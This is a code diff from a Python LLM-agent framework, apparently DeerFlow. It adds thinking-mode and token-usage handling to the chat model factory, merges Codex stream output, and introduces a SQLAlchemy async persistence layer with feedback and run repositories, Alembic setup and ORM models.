from typing import Literal
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
|
||||
class RunEventsConfig(BaseModel):
|
||||
backend: Literal["memory", "db", "jsonl"] = Field(
|
||||
default="memory",
|
||||
description="Storage backend for run events. 'memory' for development (no persistence), 'db' for production (SQL queries), 'jsonl' for lightweight single-node persistence.",
|
||||
)
|
||||
max_trace_content: int = Field(
|
||||
default=10240,
|
||||
description="Maximum trace content size in bytes before truncation (db backend only).",
|
||||
)
|
||||
track_token_usage: bool = Field(
|
||||
default=True,
|
||||
description="Whether RunJournal should accumulate token counts to RunRow.",
|
||||
)
|
||||
@@ -56,6 +56,7 @@ def create_chat_model(name: str | None = None, thinking_enabled: bool = False, *
|
||||
"supports_thinking",
|
||||
"supports_reasoning_effort",
|
||||
"when_thinking_enabled",
|
||||
"when_thinking_disabled",
|
||||
"thinking",
|
||||
"supports_vision",
|
||||
},
|
||||
@@ -72,21 +73,24 @@ def create_chat_model(name: str | None = None, thinking_enabled: bool = False, *
|
||||
raise ValueError(f"Model {name} does not support thinking. Set `supports_thinking` to true in the `config.yaml` to enable thinking.") from None
|
||||
if effective_wte:
|
||||
model_settings_from_config.update(effective_wte)
|
||||
if not thinking_enabled and has_thinking_settings:
|
||||
if effective_wte.get("extra_body", {}).get("thinking", {}).get("type"):
|
||||
if not thinking_enabled:
|
||||
if model_config.when_thinking_disabled is not None:
|
||||
# User-provided disable settings take full precedence
|
||||
model_settings_from_config.update(model_config.when_thinking_disabled)
|
||||
elif has_thinking_settings and effective_wte.get("extra_body", {}).get("thinking", {}).get("type"):
|
||||
# OpenAI-compatible gateway: thinking is nested under extra_body
|
||||
model_settings_from_config["extra_body"] = _deep_merge_dicts(
|
||||
model_settings_from_config.get("extra_body"),
|
||||
{"thinking": {"type": "disabled"}},
|
||||
)
|
||||
model_settings_from_config["reasoning_effort"] = "minimal"
|
||||
elif disable_chat_template_kwargs := _vllm_disable_chat_template_kwargs(effective_wte.get("extra_body", {}).get("chat_template_kwargs") or {}):
|
||||
elif has_thinking_settings and (disable_chat_template_kwargs := _vllm_disable_chat_template_kwargs(effective_wte.get("extra_body", {}).get("chat_template_kwargs") or {})):
|
||||
# vLLM uses chat template kwargs to switch thinking on/off.
|
||||
model_settings_from_config["extra_body"] = _deep_merge_dicts(
|
||||
model_settings_from_config.get("extra_body"),
|
||||
{"chat_template_kwargs": disable_chat_template_kwargs},
|
||||
)
|
||||
elif effective_wte.get("thinking", {}).get("type"):
|
||||
elif has_thinking_settings and effective_wte.get("thinking", {}).get("type"):
|
||||
# Native langchain_anthropic: thinking is a direct constructor parameter
|
||||
model_settings_from_config["thinking"] = {"type": "disabled"}
|
||||
if not model_config.supports_reasoning_effort:
|
||||
@@ -109,6 +113,15 @@ def create_chat_model(name: str | None = None, thinking_enabled: bool = False, *
|
||||
elif "reasoning_effort" not in model_settings_from_config:
|
||||
model_settings_from_config["reasoning_effort"] = "medium"
|
||||
|
||||
# Ensure stream_usage is enabled so that token usage metadata is available
|
||||
# in streaming responses. LangChain's BaseChatOpenAI only defaults
|
||||
# stream_usage=True when no custom base_url/api_base is set, so models
|
||||
# hitting third-party endpoints (e.g. doubao, deepseek) silently lose
|
||||
# usage data. We default it to True unless explicitly configured.
|
||||
if "stream_usage" not in model_settings_from_config and "stream_usage" not in kwargs:
|
||||
if "stream_usage" in getattr(model_class, "model_fields", {}):
|
||||
model_settings_from_config["stream_usage"] = True
|
||||
|
||||
model_instance = model_class(**kwargs, **model_settings_from_config)
|
||||
|
||||
callbacks = build_tracing_callbacks()
|
||||
|
||||
@@ -48,6 +48,10 @@ class CodexChatModel(BaseChatModel):
|
||||
|
||||
model_config = {"arbitrary_types_allowed": True}
|
||||
|
||||
@classmethod
|
||||
def is_lc_serializable(cls) -> bool:
|
||||
return True
|
||||
|
||||
@property
|
||||
def _llm_type(self) -> str:
|
||||
return "codex-responses"
|
||||
@@ -216,18 +220,48 @@ class CodexChatModel(BaseChatModel):
|
||||
def _stream_response(self, headers: dict, payload: dict) -> dict:
|
||||
"""Stream SSE from Codex API and collect the final response."""
|
||||
completed_response = None
|
||||
streamed_output_items: dict[int, dict[str, Any]] = {}
|
||||
|
||||
with httpx.Client(timeout=300) as client:
|
||||
with client.stream("POST", f"{CODEX_BASE_URL}/responses", headers=headers, json=payload) as resp:
|
||||
resp.raise_for_status()
|
||||
for line in resp.iter_lines():
|
||||
data = self._parse_sse_data_line(line)
|
||||
if data and data.get("type") == "response.completed":
|
||||
if not data:
|
||||
continue
|
||||
|
||||
event_type = data.get("type")
|
||||
if event_type == "response.output_item.done":
|
||||
output_index = data.get("output_index")
|
||||
output_item = data.get("item")
|
||||
if isinstance(output_index, int) and isinstance(output_item, dict):
|
||||
streamed_output_items[output_index] = output_item
|
||||
elif event_type == "response.completed":
|
||||
completed_response = data["response"]
|
||||
|
||||
if not completed_response:
|
||||
raise RuntimeError("Codex API stream ended without response.completed event")
|
||||
|
||||
# ChatGPT Codex can emit the final assistant content only in stream events.
|
||||
# When response.completed arrives, response.output may still be empty.
|
||||
if streamed_output_items:
|
||||
merged_output = []
|
||||
response_output = completed_response.get("output")
|
||||
if isinstance(response_output, list):
|
||||
merged_output = list(response_output)
|
||||
|
||||
max_index = max(max(streamed_output_items), len(merged_output) - 1)
|
||||
if max_index >= 0 and len(merged_output) <= max_index:
|
||||
merged_output.extend([None] * (max_index + 1 - len(merged_output)))
|
||||
|
||||
for output_index, output_item in streamed_output_items.items():
|
||||
existing_item = merged_output[output_index]
|
||||
if not isinstance(existing_item, dict):
|
||||
merged_output[output_index] = output_item
|
||||
|
||||
completed_response = dict(completed_response)
|
||||
completed_response["output"] = [item for item in merged_output if isinstance(item, dict)]
|
||||
|
||||
return completed_response
|
||||
|
||||
@staticmethod
|
||||
|
||||
@@ -23,6 +23,14 @@ class PatchedChatDeepSeek(ChatDeepSeek):
|
||||
request payload.
|
||||
"""
|
||||
|
||||
@classmethod
|
||||
def is_lc_serializable(cls) -> bool:
|
||||
return True
|
||||
|
||||
@property
|
||||
def lc_secrets(self) -> dict[str, str]:
|
||||
return {"api_key": "DEEPSEEK_API_KEY", "openai_api_key": "DEEPSEEK_API_KEY"}
|
||||
|
||||
def _get_request_payload(
|
||||
self,
|
||||
input_: LanguageModelInput,
|
||||
|
||||
@@ -0,0 +1,13 @@
|
||||
"""DeerFlow application persistence layer (SQLAlchemy 2.0 async ORM).
|
||||
|
||||
This module manages DeerFlow's own application data -- runs metadata,
|
||||
thread ownership, cron jobs, users. It is completely separate from
|
||||
LangGraph's checkpointer, which manages graph execution state.
|
||||
|
||||
Usage:
|
||||
from deerflow.persistence import init_engine, close_engine, get_session_factory
|
||||
"""
|
||||
|
||||
from deerflow.persistence.engine import close_engine, get_engine, get_session_factory, init_engine
|
||||
|
||||
__all__ = ["close_engine", "get_engine", "get_session_factory", "init_engine"]
|
||||
@@ -0,0 +1,40 @@
|
||||
"""SQLAlchemy declarative base with automatic to_dict support.
|
||||
|
||||
All DeerFlow ORM models inherit from this Base. It provides a generic
|
||||
to_dict() method via SQLAlchemy's inspect() so individual models don't
|
||||
need to write their own serialization logic.
|
||||
|
||||
LangGraph's checkpointer tables are NOT managed by this Base.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from sqlalchemy import inspect as sa_inspect
|
||||
from sqlalchemy.orm import DeclarativeBase
|
||||
|
||||
|
||||
class Base(DeclarativeBase):
|
||||
"""Base class for all DeerFlow ORM models.
|
||||
|
||||
Provides:
|
||||
- Automatic to_dict() via SQLAlchemy column inspection.
|
||||
- Standard __repr__() showing all column values.
|
||||
"""
|
||||
|
||||
def to_dict(self, *, exclude: set[str] | None = None) -> dict:
|
||||
"""Convert ORM instance to plain dict.
|
||||
|
||||
Uses SQLAlchemy's inspect() to iterate mapped column attributes.
|
||||
|
||||
Args:
|
||||
exclude: Optional set of column keys to omit.
|
||||
|
||||
Returns:
|
||||
Dict of {column_key: value} for all mapped columns.
|
||||
"""
|
||||
exclude = exclude or set()
|
||||
return {c.key: getattr(self, c.key) for c in sa_inspect(type(self)).mapper.column_attrs if c.key not in exclude}
|
||||
|
||||
def __repr__(self) -> str:
|
||||
cols = ", ".join(f"{c.key}={getattr(self, c.key)!r}" for c in sa_inspect(type(self)).mapper.column_attrs)
|
||||
return f"{type(self).__name__}({cols})"
|
||||
@@ -0,0 +1,185 @@
|
||||
"""Async SQLAlchemy engine lifecycle management.
|
||||
|
||||
Initializes at Gateway startup, provides session factory for
|
||||
repositories, disposes at shutdown.
|
||||
|
||||
When database.backend="memory", init_engine is a no-op and
|
||||
get_session_factory() returns None. Repositories must check for
|
||||
None and fall back to in-memory implementations.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
|
||||
from sqlalchemy.ext.asyncio import AsyncEngine, AsyncSession, async_sessionmaker, create_async_engine
|
||||
|
||||
|
||||
def _json_serializer(obj: object) -> str:
|
||||
"""JSON serializer with ensure_ascii=False for Chinese character support."""
|
||||
return json.dumps(obj, ensure_ascii=False)
|
||||
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
_engine: AsyncEngine | None = None
|
||||
_session_factory: async_sessionmaker[AsyncSession] | None = None
|
||||
|
||||
|
||||
async def _auto_create_postgres_db(url: str) -> None:
|
||||
"""Connect to the ``postgres`` maintenance DB and CREATE DATABASE.
|
||||
|
||||
The target database name is extracted from *url*. The connection is
|
||||
made to the default ``postgres`` database on the same server using
|
||||
``AUTOCOMMIT`` isolation (CREATE DATABASE cannot run inside a
|
||||
transaction).
|
||||
"""
|
||||
from sqlalchemy import text
|
||||
from sqlalchemy.engine.url import make_url
|
||||
|
||||
parsed = make_url(url)
|
||||
db_name = parsed.database
|
||||
if not db_name:
|
||||
raise ValueError("Cannot auto-create database: no database name in URL")
|
||||
|
||||
# Connect to the default 'postgres' database to issue CREATE DATABASE
|
||||
maint_url = parsed.set(database="postgres")
|
||||
maint_engine = create_async_engine(maint_url, isolation_level="AUTOCOMMIT")
|
||||
try:
|
||||
async with maint_engine.connect() as conn:
|
||||
await conn.execute(text(f'CREATE DATABASE "{db_name}"'))
|
||||
logger.info("Auto-created PostgreSQL database: %s", db_name)
|
||||
finally:
|
||||
await maint_engine.dispose()
|
||||
|
||||
|
||||
async def init_engine(
|
||||
backend: str,
|
||||
*,
|
||||
url: str = "",
|
||||
echo: bool = False,
|
||||
pool_size: int = 5,
|
||||
sqlite_dir: str = "",
|
||||
) -> None:
|
||||
"""Create the async engine and session factory, then auto-create tables.
|
||||
|
||||
Args:
|
||||
backend: "memory", "sqlite", or "postgres".
|
||||
url: SQLAlchemy async URL (for sqlite/postgres).
|
||||
echo: Echo SQL to log.
|
||||
pool_size: Postgres connection pool size.
|
||||
sqlite_dir: Directory to create for SQLite (ensured to exist).
|
||||
"""
|
||||
global _engine, _session_factory
|
||||
|
||||
if backend == "memory":
|
||||
logger.info("Persistence backend=memory -- ORM engine not initialized")
|
||||
return
|
||||
|
||||
if backend == "postgres":
|
||||
try:
|
||||
import asyncpg # noqa: F401
|
||||
except ImportError:
|
||||
raise ImportError("database.backend is set to 'postgres' but asyncpg is not installed.\nInstall it with:\n uv sync --extra postgres\nOr switch to backend: sqlite in config.yaml for single-node deployment.") from None
|
||||
|
||||
if backend == "sqlite":
|
||||
import os
|
||||
|
||||
from sqlalchemy import event
|
||||
|
||||
os.makedirs(sqlite_dir or ".", exist_ok=True)
|
||||
_engine = create_async_engine(url, echo=echo, json_serializer=_json_serializer)
|
||||
|
||||
# Enable WAL on every new connection. SQLite PRAGMA settings are
|
||||
# per-connection, so we wire the listener instead of running PRAGMA
|
||||
# once at startup. WAL gives concurrent reads + writers without
|
||||
# blocking and is the standard recommendation for any production
|
||||
# SQLite deployment (TC-UPG-06 in AUTH_TEST_PLAN.md). The companion
|
||||
# ``synchronous=NORMAL`` is the safe-and-fast pairing — fsync only
|
||||
# at WAL checkpoint boundaries instead of every commit.
|
||||
@event.listens_for(_engine.sync_engine, "connect")
|
||||
def _enable_sqlite_wal(dbapi_conn, _record): # noqa: ARG001 — SQLAlchemy contract
|
||||
cursor = dbapi_conn.cursor()
|
||||
try:
|
||||
cursor.execute("PRAGMA journal_mode=WAL;")
|
||||
cursor.execute("PRAGMA synchronous=NORMAL;")
|
||||
cursor.execute("PRAGMA foreign_keys=ON;")
|
||||
finally:
|
||||
cursor.close()
|
||||
elif backend == "postgres":
|
||||
_engine = create_async_engine(
|
||||
url,
|
||||
echo=echo,
|
||||
pool_size=pool_size,
|
||||
pool_pre_ping=True,
|
||||
json_serializer=_json_serializer,
|
||||
)
|
||||
else:
|
||||
raise ValueError(f"Unknown persistence backend: {backend!r}")
|
||||
|
||||
_session_factory = async_sessionmaker(_engine, expire_on_commit=False)
|
||||
|
||||
# Auto-create tables (dev convenience). Production should use Alembic.
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
# Import all models so Base.metadata discovers them.
|
||||
# When no models exist yet (scaffolding phase), this is a no-op.
|
||||
try:
|
||||
import deerflow.persistence.models # noqa: F401
|
||||
except ImportError:
|
||||
# Models package not yet available — tables won't be auto-created.
|
||||
# This is expected during initial scaffolding or minimal installs.
|
||||
logger.debug("deerflow.persistence.models not found; skipping auto-create tables")
|
||||
|
||||
try:
|
||||
async with _engine.begin() as conn:
|
||||
await conn.run_sync(Base.metadata.create_all)
|
||||
except Exception as exc:
|
||||
if backend == "postgres" and "does not exist" in str(exc):
|
||||
# Database not yet created — attempt to auto-create it, then retry.
|
||||
await _auto_create_postgres_db(url)
|
||||
# Rebuild engine against the now-existing database
|
||||
await _engine.dispose()
|
||||
_engine = create_async_engine(url, echo=echo, pool_size=pool_size, pool_pre_ping=True, json_serializer=_json_serializer)
|
||||
_session_factory = async_sessionmaker(_engine, expire_on_commit=False)
|
||||
async with _engine.begin() as conn:
|
||||
await conn.run_sync(Base.metadata.create_all)
|
||||
else:
|
||||
raise
|
||||
|
||||
logger.info("Persistence engine initialized: backend=%s", backend)
|
||||
|
||||
|
||||
async def init_engine_from_config(config) -> None:
|
||||
"""Convenience: init engine from a DatabaseConfig object."""
|
||||
if config.backend == "memory":
|
||||
await init_engine("memory")
|
||||
return
|
||||
await init_engine(
|
||||
backend=config.backend,
|
||||
url=config.app_sqlalchemy_url,
|
||||
echo=config.echo_sql,
|
||||
pool_size=config.pool_size,
|
||||
sqlite_dir=config.sqlite_dir if config.backend == "sqlite" else "",
|
||||
)
|
||||
|
||||
|
||||
def get_session_factory() -> async_sessionmaker[AsyncSession] | None:
|
||||
"""Return the async session factory, or None if backend=memory."""
|
||||
return _session_factory
|
||||
|
||||
|
||||
def get_engine() -> AsyncEngine | None:
|
||||
"""Return the async engine, or None if not initialized."""
|
||||
return _engine
|
||||
|
||||
|
||||
async def close_engine() -> None:
|
||||
"""Dispose the engine, release all connections."""
|
||||
global _engine, _session_factory
|
||||
if _engine is not None:
|
||||
await _engine.dispose()
|
||||
logger.info("Persistence engine closed")
|
||||
_engine = None
|
||||
_session_factory = None
|
||||
@@ -0,0 +1,6 @@
|
||||
"""Feedback persistence — ORM and SQL repository."""
|
||||
|
||||
from deerflow.persistence.feedback.model import FeedbackRow
|
||||
from deerflow.persistence.feedback.sql import FeedbackRepository
|
||||
|
||||
__all__ = ["FeedbackRepository", "FeedbackRow"]
|
||||
@@ -0,0 +1,30 @@
|
||||
"""ORM model for user feedback on runs."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import DateTime, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
|
||||
class FeedbackRow(Base):
|
||||
__tablename__ = "feedback"
|
||||
|
||||
feedback_id: Mapped[str] = mapped_column(String(64), primary_key=True)
|
||||
run_id: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
|
||||
thread_id: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
|
||||
owner_id: Mapped[str | None] = mapped_column(String(64), index=True)
|
||||
message_id: Mapped[str | None] = mapped_column(String(64))
|
||||
# message_id is an optional RunEventStore event identifier —
|
||||
# allows feedback to target a specific message or the entire run
|
||||
|
||||
rating: Mapped[int] = mapped_column(nullable=False)
|
||||
# +1 (thumbs-up) or -1 (thumbs-down)
|
||||
|
||||
comment: Mapped[str | None] = mapped_column(Text)
|
||||
# Optional text feedback from the user
|
||||
|
||||
created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC))
|
||||
@@ -0,0 +1,139 @@
|
||||
"""SQLAlchemy-backed feedback storage.
|
||||
|
||||
Each method acquires its own short-lived session.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import uuid
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import case, func, select
|
||||
from sqlalchemy.ext.asyncio import AsyncSession, async_sessionmaker
|
||||
|
||||
from deerflow.persistence.feedback.model import FeedbackRow
|
||||
from deerflow.runtime.user_context import AUTO, _AutoSentinel, resolve_owner_id
|
||||
|
||||
|
||||
class FeedbackRepository:
|
||||
def __init__(self, session_factory: async_sessionmaker[AsyncSession]) -> None:
|
||||
self._sf = session_factory
|
||||
|
||||
@staticmethod
|
||||
def _row_to_dict(row: FeedbackRow) -> dict:
|
||||
d = row.to_dict()
|
||||
val = d.get("created_at")
|
||||
if isinstance(val, datetime):
|
||||
d["created_at"] = val.isoformat()
|
||||
return d
|
||||
|
||||
async def create(
|
||||
self,
|
||||
*,
|
||||
run_id: str,
|
||||
thread_id: str,
|
||||
rating: int,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
message_id: str | None = None,
|
||||
comment: str | None = None,
|
||||
) -> dict:
|
||||
"""Create a feedback record. rating must be +1 or -1."""
|
||||
if rating not in (1, -1):
|
||||
raise ValueError(f"rating must be +1 or -1, got {rating}")
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.create")
|
||||
row = FeedbackRow(
|
||||
feedback_id=str(uuid.uuid4()),
|
||||
run_id=run_id,
|
||||
thread_id=thread_id,
|
||||
owner_id=resolved_owner_id,
|
||||
message_id=message_id,
|
||||
rating=rating,
|
||||
comment=comment,
|
||||
created_at=datetime.now(UTC),
|
||||
)
|
||||
async with self._sf() as session:
|
||||
session.add(row)
|
||||
await session.commit()
|
||||
await session.refresh(row)
|
||||
return self._row_to_dict(row)
|
||||
|
||||
async def get(
|
||||
self,
|
||||
feedback_id: str,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> dict | None:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.get")
|
||||
async with self._sf() as session:
|
||||
row = await session.get(FeedbackRow, feedback_id)
|
||||
if row is None:
|
||||
return None
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return None
|
||||
return self._row_to_dict(row)
|
||||
|
||||
async def list_by_run(
|
||||
self,
|
||||
thread_id: str,
|
||||
run_id: str,
|
||||
*,
|
||||
limit: int = 100,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> list[dict]:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.list_by_run")
|
||||
stmt = select(FeedbackRow).where(FeedbackRow.thread_id == thread_id, FeedbackRow.run_id == run_id)
|
||||
if resolved_owner_id is not None:
|
||||
stmt = stmt.where(FeedbackRow.owner_id == resolved_owner_id)
|
||||
stmt = stmt.order_by(FeedbackRow.created_at.asc()).limit(limit)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def list_by_thread(
|
||||
self,
|
||||
thread_id: str,
|
||||
*,
|
||||
limit: int = 100,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> list[dict]:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.list_by_thread")
|
||||
stmt = select(FeedbackRow).where(FeedbackRow.thread_id == thread_id)
|
||||
if resolved_owner_id is not None:
|
||||
stmt = stmt.where(FeedbackRow.owner_id == resolved_owner_id)
|
||||
stmt = stmt.order_by(FeedbackRow.created_at.asc()).limit(limit)
|
||||
async with self._sf() as session:
|
||||
result = await session.execute(stmt)
|
||||
return [self._row_to_dict(r) for r in result.scalars()]
|
||||
|
||||
async def delete(
|
||||
self,
|
||||
feedback_id: str,
|
||||
*,
|
||||
owner_id: str | None | _AutoSentinel = AUTO,
|
||||
) -> bool:
|
||||
resolved_owner_id = resolve_owner_id(owner_id, method_name="FeedbackRepository.delete")
|
||||
async with self._sf() as session:
|
||||
row = await session.get(FeedbackRow, feedback_id)
|
||||
if row is None:
|
||||
return False
|
||||
if resolved_owner_id is not None and row.owner_id != resolved_owner_id:
|
||||
return False
|
||||
await session.delete(row)
|
||||
await session.commit()
|
||||
return True
|
||||
|
||||
async def aggregate_by_run(self, thread_id: str, run_id: str) -> dict:
|
||||
"""Aggregate feedback stats for a run using database-side counting."""
|
||||
stmt = select(
|
||||
func.count().label("total"),
|
||||
func.coalesce(func.sum(case((FeedbackRow.rating == 1, 1), else_=0)), 0).label("positive"),
|
||||
func.coalesce(func.sum(case((FeedbackRow.rating == -1, 1), else_=0)), 0).label("negative"),
|
||||
).where(FeedbackRow.thread_id == thread_id, FeedbackRow.run_id == run_id)
|
||||
async with self._sf() as session:
|
||||
row = (await session.execute(stmt)).one()
|
||||
return {
|
||||
"run_id": run_id,
|
||||
"total": row.total,
|
||||
"positive": row.positive,
|
||||
"negative": row.negative,
|
||||
}
|
||||
@@ -0,0 +1,38 @@
|
||||
[alembic]
|
||||
script_location = %(here)s
|
||||
# Default URL for offline mode / autogenerate.
|
||||
# Runtime uses engine from DeerFlow config.
|
||||
sqlalchemy.url = sqlite+aiosqlite:///./data/app.db
|
||||
|
||||
[loggers]
|
||||
keys = root,sqlalchemy,alembic
|
||||
|
||||
[handlers]
|
||||
keys = console
|
||||
|
||||
[formatters]
|
||||
keys = generic
|
||||
|
||||
[logger_root]
|
||||
level = WARN
|
||||
handlers = console
|
||||
|
||||
[logger_sqlalchemy]
|
||||
level = WARN
|
||||
handlers =
|
||||
qualname = sqlalchemy.engine
|
||||
|
||||
[logger_alembic]
|
||||
level = INFO
|
||||
handlers =
|
||||
qualname = alembic
|
||||
|
||||
[handler_console]
|
||||
class = StreamHandler
|
||||
args = (sys.stderr,)
|
||||
level = NOTSET
|
||||
formatter = generic
|
||||
|
||||
[formatter_generic]
|
||||
format = %(levelname)-5.5s [%(name)s] %(message)s
|
||||
datefmt = %H:%M:%S
|
||||
@@ -0,0 +1,65 @@
|
||||
"""Alembic environment for DeerFlow application tables.
|
||||
|
||||
ONLY manages DeerFlow's tables (runs, threads_meta, cron_jobs, users).
|
||||
LangGraph's checkpointer tables are managed by LangGraph itself -- they
|
||||
have their own schema lifecycle and must not be touched by Alembic.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
from logging.config import fileConfig
|
||||
|
||||
from alembic import context
|
||||
from sqlalchemy.ext.asyncio import create_async_engine
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
# Import all models so metadata is populated.
|
||||
try:
|
||||
import deerflow.persistence.models # noqa: F401 — register ORM models with Base.metadata
|
||||
except ImportError:
|
||||
# Models not available — migration will work with existing metadata only.
|
||||
logging.getLogger(__name__).warning("Could not import deerflow.persistence.models; Alembic may not detect all tables")
|
||||
|
||||
config = context.config
|
||||
if config.config_file_name is not None:
|
||||
fileConfig(config.config_file_name)
|
||||
|
||||
target_metadata = Base.metadata
|
||||
|
||||
|
||||
def run_migrations_offline() -> None:
|
||||
url = config.get_main_option("sqlalchemy.url")
|
||||
context.configure(
|
||||
url=url,
|
||||
target_metadata=target_metadata,
|
||||
literal_binds=True,
|
||||
render_as_batch=True,
|
||||
)
|
||||
with context.begin_transaction():
|
||||
context.run_migrations()
|
||||
|
||||
|
||||
def do_run_migrations(connection):
|
||||
context.configure(
|
||||
connection=connection,
|
||||
target_metadata=target_metadata,
|
||||
render_as_batch=True, # Required for SQLite ALTER TABLE support
|
||||
)
|
||||
with context.begin_transaction():
|
||||
context.run_migrations()
|
||||
|
||||
|
||||
async def run_migrations_online() -> None:
|
||||
connectable = create_async_engine(config.get_main_option("sqlalchemy.url"))
|
||||
async with connectable.connect() as connection:
|
||||
await connection.run_sync(do_run_migrations)
|
||||
await connectable.dispose()
|
||||
|
||||
|
||||
if context.is_offline_mode():
|
||||
run_migrations_offline()
|
||||
else:
|
||||
asyncio.run(run_migrations_online())
|
||||
@@ -0,0 +1,23 @@
|
||||
"""ORM model registration entry point.
|
||||
|
||||
Importing this module ensures all ORM models are registered with
|
||||
``Base.metadata`` so Alembic autogenerate detects every table.
|
||||
|
||||
The actual ORM classes have moved to entity-specific subpackages:
|
||||
- ``deerflow.persistence.thread_meta``
|
||||
- ``deerflow.persistence.run``
|
||||
- ``deerflow.persistence.feedback``
|
||||
- ``deerflow.persistence.user``
|
||||
|
||||
``RunEventRow`` remains in ``deerflow.persistence.models.run_event`` because
|
||||
its storage implementation lives in ``deerflow.runtime.events.store.db`` and
|
||||
there is no matching entity directory.
|
||||
"""
|
||||
|
||||
from deerflow.persistence.feedback.model import FeedbackRow
|
||||
from deerflow.persistence.models.run_event import RunEventRow
|
||||
from deerflow.persistence.run.model import RunRow
|
||||
from deerflow.persistence.thread_meta.model import ThreadMetaRow
|
||||
from deerflow.persistence.user.model import UserRow
|
||||
|
||||
__all__ = ["FeedbackRow", "RunEventRow", "RunRow", "ThreadMetaRow", "UserRow"]
|
||||
@@ -0,0 +1,35 @@
|
||||
"""ORM model for run events."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import JSON, DateTime, Index, String, Text, UniqueConstraint
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
|
||||
class RunEventRow(Base):
|
||||
__tablename__ = "run_events"
|
||||
|
||||
id: Mapped[int] = mapped_column(primary_key=True, autoincrement=True)
|
||||
thread_id: Mapped[str] = mapped_column(String(64), nullable=False)
|
||||
run_id: Mapped[str] = mapped_column(String(64), nullable=False)
|
||||
# Owner of the conversation this event belongs to. Nullable for data
|
||||
# created before auth was introduced; populated by auth middleware on
|
||||
# new writes and by the boot-time orphan migration on existing rows.
|
||||
owner_id: Mapped[str | None] = mapped_column(String(64), nullable=True, index=True)
|
||||
event_type: Mapped[str] = mapped_column(String(32), nullable=False)
|
||||
category: Mapped[str] = mapped_column(String(16), nullable=False)
|
||||
# "message" | "trace" | "lifecycle"
|
||||
content: Mapped[str] = mapped_column(Text, default="")
|
||||
event_metadata: Mapped[dict] = mapped_column(JSON, default=dict)
|
||||
seq: Mapped[int] = mapped_column(nullable=False)
|
||||
created_at: Mapped[datetime] = mapped_column(DateTime(timezone=True), default=lambda: datetime.now(UTC))
|
||||
|
||||
__table_args__ = (
|
||||
UniqueConstraint("thread_id", "seq", name="uq_events_thread_seq"),
|
||||
Index("ix_events_thread_cat_seq", "thread_id", "category", "seq"),
|
||||
Index("ix_events_run", "thread_id", "run_id", "seq"),
|
||||
)
|
||||
@@ -0,0 +1,6 @@
|
||||
"""Run metadata persistence — ORM and SQL repository."""
|
||||
|
||||
from deerflow.persistence.run.model import RunRow
|
||||
from deerflow.persistence.run.sql import RunRepository
|
||||
|
||||
__all__ = ["RunRepository", "RunRow"]
|
||||
@@ -0,0 +1,49 @@
|
||||
"""ORM model for run metadata."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import UTC, datetime
|
||||
|
||||
from sqlalchemy import JSON, DateTime, Index, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from deerflow.persistence.base import Base
|
||||
|
||||
|
||||
class RunRow(Base):
|
||||
__tablename__ = "runs"
|
||||
|
||||
run_id: Mapped[str] = mapped_column(String(64), primary_key=True)
|
||||
thread_id: Mapped[str] = mapped_column(String(64), nullable=False, index=True)
|
||||
assistant_id: Mapped[str | None] = mapped_column(String(128))
|
||||
owner_id: Mapped[str | None] = mapped_column(String(64), index=True)
|
||||
status: Mapped[str] = mapped_column(String(20), default="pending")
|
||||
# "pending" | "running" | "success" | "error" | "timeout" | "interrupted"
|
||||
|
||||
model_name: Mapped[str | None] = mapped_column(String(128))
|
||||
multitask_strategy: Mapped[str] = mapped_column(String(20), default="reject")
|
||||
metadata_json: Mapped[dict] = mapped_column(JSON, default=dict)
|
||||
kwargs_json: Mapped[dict] = mapped_column(JSON, default=dict)
|
||||
error: Mapped[str | None] = mapped_column(Text)
|
||||
|
||||
# Convenience fields (for listing pages without querying RunEventStore)
|
||||
message_count: Mapped[int] = mapped_column(default=0)
|
||||
first_human_message: Mapped[str | None] = mapped_column(Text)
|
||||
last_ai_message: Mapped[str | None] = mapped_column(Text)
|
||||
|
||||
# Token usage (accumulated in-memory by RunJournal, written on run completion)
|
||||
total_input_tokens: Mapped[int] = mapped_column(default=0)
|
||||
total_output_tokens: Mapped[int] = mapped_column(default=0)
|
||||
total_tokens: Mapped[int] = mapped_column(default=0)
|
||||
llm_call_count: Mapped[int] = mapped_column(default=0)
|
||||
lead_agent_tokens: Mapped[int] = mapped_column(default=0)
|
||||
subagent_tokens: Mapped[int] = mapped_column(default=0)
|
||||
middleware_tokens: Mapped[int] = mapped_column(default=0)
|
||||
|
||||
# Follow-up association
|
||||
